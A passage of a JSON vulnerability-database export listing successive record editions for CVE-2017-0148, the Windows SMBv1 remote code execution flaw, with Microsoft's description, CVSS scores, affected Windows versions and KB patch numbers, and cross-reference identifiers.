x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-16T12:44:29", "differentElements": ["msAffectedSoftware"], "edition": 48}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-17T02:51:36", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB3210721", "KB3177186", "KB3205401", "KB4012215", "KB3210720", "KB4012216", "KB4013198", 
"KB4012214", "KB4013429", "KB3205409", "KB3212646", "KB4012212", "KB4012606", "KB3213986", "KBMS16-110, 3187754", "KB4012598", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T02:51:36", "differentElements": ["msAffectedSoftware"], "edition": 49}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-17T04:46:25", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB3210721", "KB4012214", "KB3205401", "KB3210720", "KB4012212", "KB4012213", "KB4013198", "KB4012216", "KB3212646", "KB4012598", "KB4012215", "KB3177186", "KB4012606", "KB3213986", "KB3205409", "KB4013429", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T04:46:25", "differentElements": ["msAffectedSoftware"], "edition": 50}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-17T10:52:46", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 